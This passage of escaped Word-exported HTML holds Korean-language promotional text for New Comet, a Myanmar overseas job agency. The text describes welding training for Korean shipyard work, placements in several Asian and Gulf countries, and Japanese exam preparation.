style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span 